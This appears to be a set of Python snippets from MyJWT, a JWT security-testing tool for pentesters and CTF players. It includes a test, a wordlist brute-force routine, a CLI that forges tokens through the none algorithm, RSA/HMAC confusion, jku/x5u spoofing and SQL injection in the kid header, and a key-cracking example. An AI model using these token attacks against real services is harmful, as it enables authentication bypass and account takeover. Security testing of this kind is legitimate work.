def test_bruteforce_wordlist(): """ Test bruteforce_wordlist method in vulnerabilities.py """ with pytest.raises(InvalidJWT): bruteforce_wordlist("", password_path) new_key = bruteforce_wordlist(jwt_bruteforce, password_path) assert new_key == key new_key = bruteforce_wordlist(jwt_bruteforce, "./wordlist/empty.txt") assert new_key == ""
def user_bruteforce_wordlist(jwt_json: Dict, wordlist: str) -> None: """ Print For bruteforce method. Parameters ---------- jwt_json: Dict your jwt json (use encode_to_json.Check Doc). wordlist: str path of your wordlist """ if "HS" not in jwt_json[HEADER]["alg"]: click.echo(CHECK_DOCS) key = bruteforce_wordlist( encode_jwt(jwt_json) + "." + jwt_json[SIGNATURE], wordlist, ) if key == "": click.echo(NOT_CRAKED) else: copy_to_clipboard(key) click.echo(CRACKED + key)
def myjwt_cli(jwt, **kwargs): """ \b This cli is for pentesters, CTF players, or dev. You can modify your jwt, sign, inject ,etc... Full documentation is at http://myjwt.readthedocs.io. If you see problems or enhancement send an issue.I will respond as soon as possible. Enjoy :) All new jwt will be copy to the clipboard. \f Parameters ---------- jwt: str your jwt kwargs: Dict all option value """ if not is_valid_jwt(jwt): sys.exit(NOT_VALID_JWT) # detect if some options are here # if no option detected print user_interface interface_mode = True for option in kwargs.values(): if not (option is None or option == () or not option or option == "GET"): interface_mode = False if interface_mode: user_interface(jwt) sys.exit() if kwargs["bruteforce"]: jwt_json = jwt_to_json(jwt) if "HS" not in jwt_json[HEADER]["alg"]: sys.exit(CHECK_DOCS) key = bruteforce_wordlist(jwt, kwargs["bruteforce"]) if key == "": sys.exit(NOT_CRAKED) else: copy_to_clipboard(key) click.echo(CRACKED + key) if (not kwargs["add_header"] and not kwargs["add_payload"] and not kwargs["full_payload"]): sys.exit() if kwargs["add_payload"]: payload_dict = dict() for payload in kwargs["add_payload"]: new_str = payload.split("=") if len(new_str) != 2: sys.exit(VALID_PAYLOAD) payload_dict[new_str[0]] = new_str[1] jwt_json = add_payload(jwt_to_json(jwt), payload_dict) jwt = encode_jwt(jwt_json) + "." + jwt_json[SIGNATURE] if kwargs["add_header"]: header_dict = dict() for header in kwargs["add_header"]: new_str = header.split("=") if len(new_str) != 2: sys.exit(VALID_HEADER) header_dict[new_str[0]] = new_str[1] jwt_json = add_header(jwt_to_json(jwt), header_dict) jwt = encode_jwt(jwt_json) + "." + jwt_json[SIGNATURE] if kwargs["full_payload"]: try: jwt_json = change_payload( jwt_to_json(jwt), json.loads(kwargs["full_payload"]), ) jwt = encode_jwt(jwt_json) + "." + jwt_json[SIGNATURE] except JSONDecodeError: sys.exit(VALID_PAYLOAD_JSON) if kwargs["x5u"]: jwt = x5u_vulnerability( jwt, url=kwargs["x5u"], pem=kwargs["key"], crt=kwargs["crt"], file=kwargs["file"], ) copy_to_clipboard(jwt) click.echo(NEW_JWT + jwt) if kwargs["jku"]: jwt = jku_vulnerability( jwt, kwargs["jku"], kwargs["file"], kwargs["key"], ) copy_to_clipboard(jwt) click.echo(NEW_JWT + jwt) click.echo( f"Please run python -m http.server --bind {kwargs['jku']} .Before send your jwt", ) if kwargs["kid"]: jwt = inject_sql_kid(jwt, kwargs["kid"]) if not kwargs["sign"]: copy_to_clipboard(jwt) click.echo(NEW_JWT + jwt) if kwargs["hmac"]: jwt = confusion_rsa_hmac(jwt, kwargs["hmac"]) copy_to_clipboard(jwt) click.echo(NEW_JWT + jwt) if kwargs["none_vulnerability"]: jwt_json = change_alg(jwt_to_json(jwt), "none") jwt = encode_jwt(jwt_json) + "." copy_to_clipboard(jwt) click.echo(NEW_JWT + jwt) if kwargs["sign"]: jwt_json = jwt_to_json(jwt) if "HS" not in jwt_json[HEADER]["alg"]: sys.exit(CHECK_DOCS) jwt = signature(jwt_json, kwargs["sign"]) copy_to_clipboard(jwt) click.echo(NEW_JWT + jwt) if kwargs["verify"]: jwt_json = jwt_to_json(jwt) if "HS" not in jwt_json[HEADER]["alg"]: sys.exit(CHECK_DOCS) new_jwt = signature(jwt_json, kwargs["verify"]) click.echo( VALID_SIGNATURE if new_jwt.split(".")[2] == jwt.split(".")[2] else INVALID_SIGNATURE, ) if kwargs["crack"]: jwt_json = jwt_to_json(jwt) if "HS" not in jwt_json[HEADER]["alg"]: sys.exit(CHECK_DOCS) all_string = list(exrex.generate(kwargs["crack"])) click.echo( kwargs["crack"] + " have " + str(len(all_string)) + " possibilities", ) with click.progressbar( all_string, label="Keys", length=len(all_string), ) as bar: for key in bar: new_jwt = signature(jwt_json, key) if new_jwt.split(".")[2] == jwt.split(".")[2]: copy_to_clipboard(key) sys.exit("Key found: " + key) sys.exit(INVALID_SIGNATURE) if kwargs["url"]: data_dict = dict() for d in kwargs["data"]: new_str = d.split("=") if len(new_str) != 2: sys.exit(VALID_DATA) if new_str[1] == "MY_JWT": data_dict[new_str[0]] = jwt else: data_dict[new_str[0]] = new_str[1] cookies_dict = dict() for cookie in kwargs["cookies"]: new_str = cookie.split("=") if len(new_str) != 2: sys.exit(VALID_COOKIES) if new_str[1] == "MY_JWT": cookies_dict[new_str[0]] = jwt else: cookies_dict[new_str[0]] = new_str[1] try: response = send_jwt_to_url( kwargs["url"], kwargs["method"], data_dict, cookies_dict, jwt, ) click.echo(response.text) except requests.exceptions.ConnectionError: sys.exit("Connection Error. Verify your url.") if kwargs["print"]: copy_to_clipboard(jwt) print_decoded(jwt) if (not kwargs["none_vulnerability"] and not kwargs["hmac"] and not kwargs["bruteforce"] and not kwargs["sign"] and not kwargs["verify"] and not kwargs["jku"] and not kwargs["x5u"] and not kwargs["print"]): copy_to_clipboard(jwt) click.echo(NEW_JWT + jwt) sys.exit()
from myjwt.vulnerabilities import bruteforce_wordlist jwt = "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjpudWxsfQ.Tr0VvdP6rVBGBGuI_luxGCOaz6BbhC6IxRTlKOW8UjM" # Header: {"typ": "JWT", "alg": "HS256"} # Payload: {"user": null} # Signature: "Tr0VvdP6rVBGBGuI_luxGCOaz6BbhC6IxRTlKOW8UjM" wordlist = "../../wordlist/common_pass.txt" # wordlist is path file of your dict (format: txt, 1 line = 1 password) key = bruteforce_wordlist(jwt, wordlist) # key is secret key used for signature # return is a key or "" if bruteforce failed # if you get a key use 03-sign-key script for modify your jwt then re-sign your jwt with the secret key key print(key)